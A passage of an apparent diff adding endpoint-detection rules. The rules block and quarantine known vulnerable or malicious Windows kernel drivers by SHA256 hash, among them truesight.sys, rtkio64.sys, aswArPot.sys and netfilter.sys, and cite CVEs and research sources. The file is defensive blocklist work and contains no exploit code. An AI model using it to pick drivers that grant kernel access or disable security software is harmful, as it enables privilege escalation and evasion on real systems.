+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e657e54c341d37881837dbaf553e10bbe31ff2d6ccf9ca939ca5433ec464a73b",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "401507f6-311a-57d5-8d59-0610ebdfbb39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480791Z",
+ "creation_date": "2026-03-23T11:45:31.480794Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6b6b7606fec21af6dd3532314592dbcead7f43852044e1f3655889f50cb0704",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4016d471-bc45-5cb2-b523-62ceef6bdc24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827428Z",
+ "creation_date": "2026-03-23T11:45:31.827431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dcae7db1bb23c65b5ba8fc33cb70bd899b5885476f1a9ff8a85e3870f16068c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "401c9651-db4d-53b9-a405-4b52e05abbeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487505Z",
+ "creation_date": "2026-03-23T11:45:31.487507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c4190298c143714531a86458e5e3934fbc3fca0a9d73f44cc6757fb85e78082",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4024bcd0-78ee-54b0-a47b-ad27ea514ae0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618788Z",
+ "creation_date": "2026-03-23T11:45:29.618791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcef3c2fe44a68992d2344a8ec129e9d35e7790f4317e9bd7bca6bf217252d91",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "403376f8-965d-5ce6-9a46-cf5e0119852d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489627Z",
+ "creation_date": "2026-03-23T11:45:31.489630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aca2d74e09757c2a29e5ed4a1530d2b33f17b11cf5a15567afef30e6fe77debe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "404d22e7-291a-535c-a397-bfd0e70b4e80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490748Z",
+ "creation_date": "2026-03-23T11:45:31.490750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33152527615b92ced0d54dd7bf4ccd20cded5ce85232425fba7991b22942a763",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4052fa9f-023e-597e-8268-131520bb6fba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834241Z",
+ "creation_date": "2026-03-23T11:45:30.834245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7da06c9844088ecb59445f8d04f13a42b435ed71843fbdde8af44ef4cae234fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4053de44-a1e7-5f18-9e4e-82ce48523feb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491574Z",
+ "creation_date": "2026-03-23T11:45:31.491577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1568a3eed6dffeeb9869cbcb7f6fd852d05b2eb8f78f4b4242a54e652052f4ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4054dfc2-c271-54a7-a88d-d6efb29cec45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967420Z",
+ "creation_date": "2026-03-23T11:45:29.967422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac4",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "405a2d52-5d19-5d06-b75c-ff8c9fefbe42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475347Z",
+ "creation_date": "2026-03-23T11:45:31.475351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74d3c4c96a2598c883561d5caabaddd71a81d6bd65760b32c93c5161bd28d596",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406087ff-389a-5e47-a975-1c2eafd2a5be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152035Z",
+ "creation_date": "2026-03-23T11:45:31.152038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "791e46f7a9464c34c95fa0f7d468b8b0b8ef5a60b766c445d78dedad2300396b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4061ead4-94a3-565a-aa93-2a7d90b688cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497651Z",
+ "creation_date": "2026-03-23T11:45:31.497654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e5a1c86133049837c7a0a4e334a2e3f24f8580a4b7d1a2776a6258727f5a493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4063d9d1-6024-5156-94a2-084e78a4fc64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984529Z",
+ "creation_date": "2026-03-23T11:45:29.984531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e288439705d9be2c1f74cf8a44c3853ac3708e52c592b23398877006fadf6ccc",
+ "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406446c7-43c2-5a3a-b5da-8b18ed0e4fda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969682Z",
+ "creation_date": "2026-03-23T11:45:29.969684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1b31926afb22ef6f8a3486f101da279d47c09d4acdb3a7bc743a7df8ae727bb",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4069e4e0-850f-5a57-981b-a3b89bb587e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146277Z",
+ "creation_date": "2026-03-23T11:45:31.146279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e26284a5fb856e2dd08d4d170348f57bb583ec9201ad225115feed1220cb39e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406af8cb-e469-5353-9e17-eccec3a52c2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481133Z",
+ "creation_date": "2026-03-23T11:45:30.481135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ff4ef4bc143cb8df2ae2f800d5124b117456b2e04d4c33db766b7e8e21ea048",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40735f29-624e-5df2-b2d6-19c27f3ec6d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824646Z",
+ "creation_date": "2026-03-23T11:45:31.824648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ccbc6ab55d49b3f095fb3225e21df9c7752a9dd31febb13bde051c74b2d2b8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "407aef52-6273-5ec0-8312-a9d2ae2eeffe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817060Z",
+ "creation_date": "2026-03-23T11:45:31.817062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1bdca534d8c83ecc2ae0f5db03d69c9687d8822662bd79c1d4640977dde2d75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "407c1343-a14c-5554-a927-930e545dbcb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494409Z",
+ "creation_date": "2026-03-23T11:45:31.494412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a60639f3f5e821c5c2eeef8a7bcbfc3fa5dc4b96641aaa081a1ea613155f71b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40891794-b185-56da-aeb1-2e1a65ff5fe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485801Z",
+ "creation_date": "2026-03-23T11:45:31.485805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b1eb05d052ba7fa8eafbcb6d1a224203339f690fb8dd289f486aa579418fe2f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "408d6b34-a5d6-539d-9ef8-77a515f2199c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809341Z",
+ "creation_date": "2026-03-23T11:45:31.809344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b9ce9a3dca79650b59b056fa0805cb757e1acd9c320911ac5db701c99ab6290",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4090cd0b-8f9d-50d6-8bf4-7d732d25a89f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140511Z",
+ "creation_date": "2026-03-23T11:45:31.140513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
